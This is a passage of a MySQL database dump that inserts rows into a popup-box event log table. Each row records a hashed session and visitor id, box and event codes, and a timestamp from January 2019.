(47389, '59d1d47927ff049a03988a05a476fc5e', '2ee6e8c258f5d2a5', 0, 2, 1, '2019-01-08 16:32:56'),
(47390, '5481ebd5d59ae1c4004e0ef91e379307', 'cad202a09758cb3a', 0, 2, 1, '2019-01-08 16:33:14'),
(47391, '11286a3986d2a70d931586a3fd340293', 'a02a3c80cccf2b95', 0, 2, 1, '2019-01-08 16:34:11'),
(47392, 'fbf932076057a845de3b75a58e8a37b3', '32b169e936bbe5df', 0, 2, 1, '2019-01-08 16:34:17'),
(47393, '95a68b8c0de5a5aa2de9d306df9fd914', 'b3dc303f7a11cd2f', 0, 2, 1, '2019-01-08 16:34:22'),
(47394, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:36:44'),
(47395, '0f73dfa78aed3b3c047072f703453c06', '983927a8fc0337b3', 0, 2, 1, '2019-01-08 16:38:31'),
(47396, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-08 16:40:20'),
(47397, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-08 16:40:56'),
(47398, 'f03aea323a11b699a228377a48e94c07', '6d8c93203d1bd217', 0, 2, 1, '2019-01-08 16:41:27'),
(47399, 'bc50a37c79862307da367b4bce286b9c', 'a5736c988cfb53ac', 0, 2, 1, '2019-01-08 16:42:39'),
(47400, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:44:23'),
(47401, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-08 16:45:14'),
(47402, 'bc50a37c79862307da367b4bce286b9c', 'a5736c988cfb53ac', 0, 2, 1, '2019-01-08 16:45:52'),
(47403, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:46:14'),
(47404, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:46:46'),
(47405, '6688b64aeb6843b784b5349def79851f', 'f556605047b35dd8', 0, 2, 1, '2019-01-08 16:47:52'),
(47406, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:49:05'),
(47407, '2b0ec410ddaa79dc7e9a2d3b350637c0', '2034f09284a4c7ca', 0, 2, 1, '2019-01-08 16:49:12'),
(47408, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:49:44'),
(47409, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 16:50:00'),
(47410, 'ffb445e0e8d2f175c7545d54667d2da2', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-08 16:54:33'),
(47411, '8d56f6c8949f3d915eb63e9c5ecc40b8', '638f6b1ac3b915c3', 0, 2, 1, '2019-01-08 16:54:55'),
(47412, '8d56f6c8949f3d915eb63e9c5ecc40b8', '638f6b1ac3b915c3', 0, 2, 1, '2019-01-08 16:55:46'),
(47413, '3feaa5146694ad43a1542b5875e485f5', '546887b39507976e', 0, 2, 1, '2019-01-08 16:57:32'),
(47414, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:00:56'),
(47415, '70b18390b6d17a2205519852e739cad0', '2ac73fd527e16579', 0, 2, 1, '2019-01-08 17:02:23'),
(47416, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:04:39'),
(47417, '94c15aa8ee280db51b94727abab76b40', '7501b42c35accff7', 0, 2, 1, '2019-01-08 17:05:05'),
(47418, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 17:10:45'),
(47419, 'f03aea323a11b699a228377a48e94c07', '6d8c93203d1bd217', 0, 2, 1, '2019-01-08 17:10:47'),
(47420, 'ffb445e0e8d2f175c7545d54667d2da2', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-08 17:10:50'),
(47421, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-08 17:11:32'),
(47422, 'fbf932076057a845de3b75a58e8a37b3', '32b169e936bbe5df', 0, 2, 1, '2019-01-08 17:11:46'),
(47423, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:11:48'),
(47424, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 17:13:07'),
(47425, '7f38bd77c915e204e9dbf1f05076bd07', '0530018377078939', 0, 2, 1, '2019-01-08 17:13:12'),
(47426, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-01-08 17:14:40'),
(47427, 'ffb445e0e8d2f175c7545d54667d2da2', 'a5467ba381fa9fff', 0, 2, 1, '2019-01-08 17:15:10'),
(47428, 'f03aea323a11b699a228377a48e94c07', '6d8c93203d1bd217', 0, 2, 1, '2019-01-08 17:15:14'),
(47429, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:15:17'),
(47430, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:18:09'),
(47431, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:18:19'),
(47432, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:21:12'),
(47433, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:22:20'),
(47434, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:22:27'),
(47435, '8d56f6c8949f3d915eb63e9c5ecc40b8', '638f6b1ac3b915c3', 0, 2, 1, '2019-01-08 17:24:22'),
(47436, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:26:15'),
(47437, 'e1995a4ff848a6fde3fc744298ac4ef0', 'd41d27a07fecd28c', 0, 2, 1, '2019-01-08 17:26:22'),
(47438, 'f03aea323a11b699a228377a48e94c07', '6d8c93203d1bd217', 0, 2, 1, '2019-01-08 17:28:26'),
(47439, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 17:40:36'),
(47440, '175dc95bda2e243c3c15e9056fc95b27', 'f10990f26adcd1c5', 0, 2, 1, '2019-01-08 17:41:41'),
(47441, 'c83017acf4b84600fc8384a7e7adefb0', 'ec298f16abca1ffa', 0, 2, 1, '2019-01-08 17:46:04'),
(47442, '5481ebd5d59ae1c4004e0ef91e379307', 'cad202a09758cb3a', 0, 2, 1, '2019-01-08 17:46:15'),
(47443, 'c83017acf4b84600fc8384a7e7adefb0', 'ec298f16abca1ffa', 0, 2, 1, '2019-01-08 17:46:19'),
(47444, 'cb702475a66b218f85a9ddddccf6a540', 'c898c4d1cffe71cc', 0, 2, 1, '2019-01-08 17:53:58'),
(47445, 'f82502e343be668417f1da353d4ec14b', 'fcaa3c8d44082e09', 0, 2, 1, '2019-01-08 17:56:26'),
(47446, 'd2a6b615f0e786c67c420f807f1ad5b0', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-01-08 17:56:46'),
(47447, 'f82502e343be668417f1da353d4ec14b', 'fcaa3c8d44082e09', 0, 2, 1, '2019-01-08 17:59:58'),
(47448, '88a70282ee560f7dd516a5a218c916d6', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-08 18:01:04'),
(47449, '88a70282ee560f7dd516a5a218c916d6', 'a4a07b7594d06ca8', 0, 2, 1, '2019-01-08 18:01:18'),
(47450, 'bae98444e1921857b8016670e62ea03d', 'dc790a6414fe3eb7', 0, 2, 1, '2019-01-08 18:01:46'),
(47451, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-08 18:10:55'),
(47452, '047888236e1025b94a191d5d9b2179f0', '7716f6d384ad77bf', 0, 2, 1, '2019-01-08 18:16:30'),
(47453, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-08 18:17:08'),
(47454, '140abe6c0fb024aaeda9a34a2dd044a2', '1c68b977b911188c', 0, 2, 1, '2019-01-08 18:24:14'),
(47455, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-08 18:37:46'),
(47456, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-08 18:39:50'),
(47457, '403bbbb753b8f2b929ae0680e6593ef1', '4574603cf07e6399', 0, 2, 1, '2019-01-08 18:52:21'),
(47458, '4af726bcef15466ca065159036fa9d29', 'bad40917fb8d8979', 0, 2, 1, '2019-01-08 19:20:44'),
(47459, '15d2379d37937211f9f9508f88b078f9', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-01-08 19:25:05'),
(47460, 'af2010ad0c069446c5d7fa111c5cfb52', '5d7d54b3f4354e61', 0, 2, 1, '2019-01-08 19:47:40'),
(47461, 'af2010ad0c069446c5d7fa111c5cfb52', '5d7d54b3f4354e61', 0, 2, 1, '2019-01-08 19:52:34'),
(47462, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 19:53:40'),
(47463, '7308ee2e158ac5f518e76f414b746a55', '11b128dbe69c9e7a', 0, 2, 1, '2019-01-08 19:54:56'),
(47464, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 19:56:44'),
(47465, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 20:18:18'),
(47466, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 20:18:40'),
(47467, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 20:19:42'),
(47468, '058369bfb2477ad39637b02b58d7707a', '7ad576b7a715125d', 0, 2, 1, '2019-01-08 20:27:44'),
(47469, '5c3c1eb838dd4b3ff6a6334ad6aa7dd5', '162b897c9b72c59c', 0, 2, 1, '2019-01-08 20:39:34'),
(47470, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:47:09'),
(47471, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:48:07'),
(47472, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:53:41'),
(47473, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:54:09'),
(47474, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:55:28'),
(47475, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:58:04'),
(47476, '7b1093f26b1da71e6adc18839d8bbd07', 'e49854c6c19255ab', 0, 2, 1, '2019-01-08 20:58:38'),
(47477, 'c5bd3a19a1dc8ddf67c07c66cfbe8c25', 'bf8563ec65c7310a', 0, 2, 1, '2019-01-08 21:57:04');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(47478, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:00:04'),
(47479, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:06:40'),
(47480, '57e8d077ef86d6a82a9673149d1318d8', '53b9924f1532d837', 0, 2, 1, '2019-01-08 22:23:38'),
(47481, '2969a9acb2bd32888875378b55523759', 'd0ee503bb6a57ff6', 0, 2, 1, '2019-01-08 22:29:32'),
(47482, '059d2cc81a7e7e0216f804223ecc4b18', '99e1118d3e257d32', 0, 2, 1, '2019-01-08 22:38:33'),
(47483, 'c10b0acd82c71571ab119080ff5f40d8', '2d3ee3418d6cc3a4', 0, 2, 1, '2019-01-08 22:45:17'),
(47484, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:47:44'),
(47485, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:48:31'),
(47486, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:51:19'),
(47487, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:52:43'),
(47488, '08c795f08f9bd5fd62f41e2c952d700f', '52315965a99b7ff4', 0, 2, 1, '2019-01-08 22:53:27'),
(47489, '2969a9acb2bd32888875378b55523759', 'd0ee503bb6a57ff6', 0, 2, 1, '2019-01-08 23:17:56'),
(47490, '2969a9acb2bd32888875378b55523759', 'd0ee503bb6a57ff6', 0, 2, 1, '2019-01-08 23:18:34'),
(47491, '263c049375adb761ece8da954cd79fc8', '4727f9281a8da559', 0, 2, 1, '2019-01-08 23:35:24'),
(47492, 'e0ee6c3c9a61a69d80a0c37bef5c8dd4', 'e84d0e4306f0303e', 0, 2, 1, '2019-01-08 23:37:46'),
(47493, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-08 23:50:35'),
(47494, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-08 23:51:59'),
(47495, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-08 23:54:07'),
(47496, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-08 23:54:32'),
(47497, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:01:53'),
(47498, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:02:32'),
(47499, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:04:49'),
(47500, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:07:20'),
(47501, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:07:50'),
(47502, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:08:14'),
(47503, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:11:54'),
(47504, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:14:27'),
(47505, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:16:04'),
(47506, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:16:17'),
(47507, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:16:23'),
(47508, 'ef456888c8aeaa5a6ccec9802d402dd3', '613830be660d736c', 0, 2, 1, '2019-01-09 00:16:32'),
(47509, '51ff0f05b2483d151d3d0194aa43dd6c', 'ac8cc6f59ddef8ea', 0, 2, 1, '2019-01-09 02:17:35'),
(47510, '7de9f1acb3dfed667f52b9935ff5190f', '84bb53bfbf3a7a8c', 0, 2, 1, '2019-01-09 03:54:14'),
(47511, '7de9f1acb3dfed667f52b9935ff5190f', '84bb53bfbf3a7a8c', 0, 2, 1, '2019-01-09 03:58:06'),
(47512, '7ea3b0b89c1475018f3867ae32088707', '2da7f325565fb1fd', 0, 2, 1, '2019-01-09 04:19:20'),
(47513, '7ea3b0b89c1475018f3867ae32088707', '2da7f325565fb1fd', 0, 2, 1, '2019-01-09 04:19:41'),
(47514, 'd7dc96b16b10b403a546762935adc884', '2fa458d0337a4355', 0, 2, 1, '2019-01-09 04:21:15'),
(47515, '8048f97f36135c9dc7634ee26c3e14a6', '865219f3cd14c35e', 0, 2, 1, '2019-01-09 04:32:34'),
(47516, '9dd07886e52334d0e53bd45de10288c9', '4aa049c548b22ad2', 0, 2, 1, '2019-01-09 04:57:19'),
(47517, '9dd07886e52334d0e53bd45de10288c9', '4aa049c548b22ad2', 0, 2, 1, '2019-01-09 04:57:56'),
(47518, '5c3c1eb838dd4b3ff6a6334ad6aa7dd5', '162b897c9b72c59c', 0, 2, 1, '2019-01-09 05:28:05'),
(47519, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-09 05:43:20'),
(47520, '2e3f23a96fe9f9bd201a10b17b9fc96d', '330a028b8fe737cc', 0, 2, 1, '2019-01-09 05:57:27'),
(47521, '69d3f4708b21db988e9a316e5b6abee9', 'ebf47c6dc70aae43', 0, 2, 1, '2019-01-09 06:11:16'),
(47522, 'acc068b95fbf3a742f898e9cbd69bd7c', '7e574661cd364408', 0, 2, 1, '2019-01-09 07:23:09'),
(47523, 'acc068b95fbf3a742f898e9cbd69bd7c', '7e574661cd364408', 0, 2, 1, '2019-01-09 07:23:27'),
(47524, 'acc068b95fbf3a742f898e9cbd69bd7c', '7e574661cd364408', 0, 2, 1, '2019-01-09 07:23:41'),
(47525, 'f482cabc7fe1bd8fc4edd8a0dc2834cc', '34b6b3be96bf469a', 0, 2, 1, '2019-01-09 08:01:10'),
(47526, 'f9c87e882b5b4bfdf332f741b4de9ace', 'f2cf8e80f4a7db26', 0, 2, 1, '2019-01-09 08:22:47'),
(47527, 'a843ce4a4fa94791a9ac24f2ebe2011e', 'bfdd9893b15ed5e7', 0, 2, 1, '2019-01-09 08:22:51'),
(47528, '9539cca7a072664f2def6a6a3643e999', '0f82ee3c80278677', 0, 2, 1, '2019-01-09 08:33:17'),
(47529, '9706c644daa3e39f9b90a96e2fc55209', '037214e4d3c59e4a', 0, 2, 1, '2019-01-09 08:42:29'),
(47530, '4b2841098bb9c1ba528571fa1757be35', 'c6ff6290c756b377', 0, 2, 1, '2019-01-09 09:00:04'),
(47531, 'c9ad3ad4073d848fbbc35ccf6d5805cb', '57f83b1c8dbf2af1', 0, 2, 1, '2019-01-09 09:45:37'),
(47532, 'c9ad3ad4073d848fbbc35ccf6d5805cb', '57f83b1c8dbf2af1', 0, 2, 1, '2019-01-09 09:47:25'),
(47533, 'c9ad3ad4073d848fbbc35ccf6d5805cb', '57f83b1c8dbf2af1', 0, 2, 1, '2019-01-09 09:48:11'),
(47534, 'c9ad3ad4073d848fbbc35ccf6d5805cb', '57f83b1c8dbf2af1', 0, 2, 1, '2019-01-09 09:48:50'),
(47535, 'c9ad3ad4073d848fbbc35ccf6d5805cb', '57f83b1c8dbf2af1', 0, 2, 1, '2019-01-09 09:55:59'),
(47536, '8197aa6fef9cff127d40d2ae63739838', '7597ffa0f637d917', 0, 2, 1, '2019-01-09 09:56:30'),
(47537, '966ff2287d8cb9f71e822f6e4b5e1cd2', 'b496d85defbbb42f', 0, 2, 1, '2019-01-09 10:04:22'),
(47538, '966ff2287d8cb9f71e822f6e4b5e1cd2', 'b496d85defbbb42f', 0, 2, 1, '2019-01-09 10:05:23'),
(47539, '29e6f8a87c6f40702158510f6a079c79', '5715e67b8fe4ab60', 0, 2, 1, '2019-01-09 10:10:07'),
(47540, 'c52cc805831e9fde237ea067524edd59', '9537fa17f0c0a816', 0, 2, 1, '2019-01-09 10:13:04'),
(47541, 'c9a19c61e617cdbc9f0f98737fca2d05', 'c6d9db0c7f22aa72', 0, 2, 1, '2019-01-09 10:18:52'),
(47542, '8d7804bf03c28da117777bfbef4d424c', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-09 10:28:20'),
(47543, '8d7804bf03c28da117777bfbef4d424c', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-09 10:28:35'),
(47544, '8d7804bf03c28da117777bfbef4d424c', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-09 10:58:49'),
(47545, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-09 11:04:37'),
(47546, 'b3c6b65702d7742682f394a57ed20b4f', '2b3a8e165f3960e8', 0, 2, 1, '2019-01-09 11:44:33'),
(47547, 'ca3d9de76f95619e56ea8f1339b0a762', 'a4357355beace0f0', 0, 2, 1, '2019-01-09 11:45:45'),
(47548, '9408b59dcf13f51cb1df40b1b6efd817', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-01-09 12:15:16'),
(47549, '9408b59dcf13f51cb1df40b1b6efd817', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-01-09 12:15:40'),
(47550, 'f579ccb25ba8224a557b10138dfdbeb7', '7ca5526f425808c3', 0, 2, 1, '2019-01-09 12:20:09'),
(47551, '7ac49e4e0d9c388089b15f4fbae81fe3', '846ebbc16c331d47', 0, 2, 1, '2019-01-09 12:47:42'),
(47552, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 12:58:12'),
(47553, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 12:59:51'),
(47554, '4f84af51f64145c9580e72f42e71af26', '51df446c19685386', 0, 2, 1, '2019-01-09 13:02:02'),
(47555, 'ac40acb9a13635d10ad22849901e8584', '2705f25b4bbbc8b9', 0, 2, 1, '2019-01-09 13:09:01'),
(47556, '4214c0dab36d73c9ea8d50c6076e162d', '5228e39a581dbf7b', 0, 2, 1, '2019-01-09 13:13:54'),
(47557, '0dc0fff4fae66e17a01974437f3648d6', 'a6acdc1d24f3ee53', 0, 2, 1, '2019-01-09 13:37:10'),
(47558, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 13:38:39'),
(47559, '66cf2b44fe7b0d608d4f6cc178815bdb', '278ac44163c20930', 0, 2, 1, '2019-01-09 13:46:40'),
(47560, '66cf2b44fe7b0d608d4f6cc178815bdb', '278ac44163c20930', 0, 2, 1, '2019-01-09 13:54:54'),
(47561, '2d9c78a0c58ded675d9522e59ff98b77', 'd7a0e43ccf635414', 0, 2, 1, '2019-01-09 14:22:02'),
(47562, '2d9c78a0c58ded675d9522e59ff98b77', 'd7a0e43ccf635414', 0, 2, 1, '2019-01-09 14:22:10'),
(47563, '2d9c78a0c58ded675d9522e59ff98b77', 'd7a0e43ccf635414', 0, 2, 1, '2019-01-09 14:22:23'),
(47564, '6ee295c0a3b41f75b7bf44cb9f74bc9b', '2955da4d8adca62b', 0, 2, 1, '2019-01-09 14:24:05'),
(47565, '3cc90be896215f9c5502e5283e03590d', '28b706d4b4dd8e9e', 0, 2, 1, '2019-01-09 14:26:06'),
(47566, '3cc90be896215f9c5502e5283e03590d', '28b706d4b4dd8e9e', 0, 2, 1, '2019-01-09 14:27:10'),
(47567, '3cc90be896215f9c5502e5283e03590d', '28b706d4b4dd8e9e', 0, 2, 1, '2019-01-09 14:39:55'),
(47568, 'f1af79d7d534e2724de2f87adbe3a582', 'bae0aee6d11eb89c', 0, 2, 1, '2019-01-09 14:43:42'),
(47569, 'f816fc5ab14e88bd564cad7bebef0532', '3ba3484de462963c', 0, 2, 1, '2019-01-09 14:56:58'),
(47570, '05c694fdeaf57a71af9c57e123166ff5', 'cdec789e983c978f', 0, 2, 1, '2019-01-09 15:12:41'),
(47571, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-09 15:14:13'),
(47572, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-09 15:14:49'),
(47573, '25df4a6bb30efc5d6522e7f068d4b275', '503a514a8daa32a7', 0, 2, 1, '2019-01-09 15:17:43'),
(47574, '2558115f9129b46d5a418b067709729a', '2955da4d8adca62b', 0, 2, 1, '2019-01-09 15:19:05'),
(47575, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 15:20:45'),
(47576, '25df4a6bb30efc5d6522e7f068d4b275', '503a514a8daa32a7', 0, 2, 1, '2019-01-09 15:25:44'),
(47577, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-09 15:36:23'),
(47578, '25df4a6bb30efc5d6522e7f068d4b275', '503a514a8daa32a7', 0, 2, 1, '2019-01-09 15:36:28'),
(47579, '46cf74d50f0ab07a24f2e07687143826', '2034f09284a4c7ca', 0, 2, 1, '2019-01-09 15:36:45'),
(47580, '46cf74d50f0ab07a24f2e07687143826', '2034f09284a4c7ca', 0, 2, 1, '2019-01-09 15:37:18'),
(47581, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-09 15:41:17'),
(47582, '3929a6381d1723d4b66ec23b70139ec6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:44:17'),
(47583, '3929a6381d1723d4b66ec23b70139ec6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:44:51'),
(47584, '3929a6381d1723d4b66ec23b70139ec6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:45:20'),
(47585, 'bfcf352235d41fa3b9aba01d79cfebb8', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:46:31'),
(47586, 'bfcf352235d41fa3b9aba01d79cfebb8', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:47:00'),
(47587, 'f816fc5ab14e88bd564cad7bebef0532', '3ba3484de462963c', 0, 2, 1, '2019-01-09 15:48:27'),
(47588, '60b9145f190e5bc9775d33055d9bf5e6', '0b3920d22e80d952', 0, 2, 1, '2019-01-09 15:48:52'),
(47589, '9276bd12f9fbff5e33faabc875009769', 'df27b9a2919a8206', 0, 2, 1, '2019-01-09 15:49:19'),
(47590, '388a417b0fbea067c87417c6336889fa', '9968c5be4a7971a2', 0, 2, 1, '2019-01-09 15:50:04'),
(47591, '6e9c08c6bbf74988f7992b7bdea92a47', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:50:59'),
(47592, 'f0eb0ef077e18da777ec9a87262e744c', '1c68b977b911188c', 0, 2, 1, '2019-01-09 15:54:18'),
(47593, 'f816fc5ab14e88bd564cad7bebef0532', '3ba3484de462963c', 0, 2, 1, '2019-01-09 15:55:42'),
(47594, '19daa49bc767b66fd95f231781a135e6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:56:53'),
(47595, '15dc23b0607d735a44b38e5a427eada4', '32b169e936bbe5df', 0, 2, 1, '2019-01-09 15:57:18'),
(47596, '8a2709cc901947298edcce97403282be', '528a8aaffe2d7f11', 0, 2, 1, '2019-01-09 15:57:46'),
(47597, '8a2709cc901947298edcce97403282be', '528a8aaffe2d7f11', 0, 2, 1, '2019-01-09 15:58:42'),
(47598, '19daa49bc767b66fd95f231781a135e6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:58:47'),
(47599, '19daa49bc767b66fd95f231781a135e6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 15:59:37'),
(47600, 'f0eb0ef077e18da777ec9a87262e744c', '1c68b977b911188c', 0, 2, 1, '2019-01-09 15:59:49'),
(47601, '28c9c5fc9c7cc7c5738e1a7ed0bcad99', '8c9db562eb8705f9', 0, 2, 1, '2019-01-09 16:00:29'),
(47602, '19daa49bc767b66fd95f231781a135e6', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 16:01:07'),
(47603, '82366aa6a8ea1581d3c939ec6e7fb110', '65fb1a08fe2b5aab', 0, 2, 1, '2019-01-09 16:01:21'),
(47604, 'b901fbf242b08d8058d0e90bca7b7971', '19e548dd12d40585', 0, 2, 1, '2019-01-09 16:02:03'),
(47605, '25df4a6bb30efc5d6522e7f068d4b275', '503a514a8daa32a7', 0, 2, 1, '2019-01-09 16:02:29'),
(47606, '93d56e471e2b84980644f365fab9aeb0', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-01-09 16:02:29'),
(47607, 'cfd0be05ee8ed8f0d5c759e602bdf2ef', '77d63d0a90a92829', 0, 2, 1, '2019-01-09 16:02:56'),
(47608, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2019-01-09 16:02:59'),
(47609, 'cdd5a5a0254e8138a170c44f04d52b6c', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-09 16:04:15'),
(47610, 'bdd029c1458608f31626e3158b8c011d', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 16:04:23'),
(47611, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-09 16:04:39'),
(47612, 'cdd5a5a0254e8138a170c44f04d52b6c', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-09 16:04:44'),
(47613, '2d629d3659af53656d822ad8d4dd5591', '29608a328df169fa', 0, 2, 1, '2019-01-09 16:04:52'),
(47614, '95dd76d76479cfb9bb5130ed399e79b8', 'f19010d8a5f137d0', 0, 2, 1, '2019-01-09 16:04:59'),
(47615, '23a04118249030198ff13685aacece04', '65e15ddccfc78921', 0, 2, 1, '2019-01-09 16:05:16'),
